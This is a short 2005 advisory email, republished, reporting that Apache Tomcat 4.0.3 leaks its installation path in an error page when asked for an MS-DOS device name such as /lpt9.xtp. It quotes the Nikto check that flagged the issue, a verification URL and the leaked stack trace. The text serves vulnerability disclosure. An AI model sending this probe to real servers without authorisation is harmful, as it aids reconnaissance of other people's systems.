[This was originally sent to CVE and Nikto and then published on OSVDB, now gone. It was discovered in an old version of Apache Tomcat and the solution had existed for several years. VulnDB 20033]
From: security curmudgeon
To: Steven Christey , Sullo of Nikto
Date: Thu, 13 Oct 2005 14:21:33 -0400 (EDT)
Subject: Apache Tomcat 4.0.3 MS-DOS Device Request Path Disclosure
Didn’t see this in CVE or OSVDB. There is a known issue with several web servers including Resin, that when requesting a file that matches a MS-DOS file name, it will error out. Such errors will sometimes include installation path information.
While testing a few servers, the Nikto check for this triggered, but the server wasn’t Resin:
Nikto check that triggered:
- OSVDB-0: GET /lpt9.xtp : Resin 2.1 reveals the server path when a DOS device is requested.
Actual server:
- Server: Apache Tomcat/4.0.3 (HTTP/1.1 Connector)
To verify:
http://[target]:5225/lpt9.xtp
Apache Tomcat/4.0.3 – HTTP Status 500 – Internal Server Error
type Exception report
message Internal Server Error
description The server encountered an internal error (Internal Server Error) that prevented it from fulfilling this request.
exception
java.io.FileNotFoundException: C:\Program
Files\Hewlett-Packard\Toolbox2.0\Apache Tomcat 4.0\webapps\ROOT\lpt9.xtp (The system cannot find the file specified)
at java.io.FileInputStream.open(Native Method)
at java.io.FileInputStream.(Unknown Source)
at java.io.FileInputStream.(Unknown Source)
[..]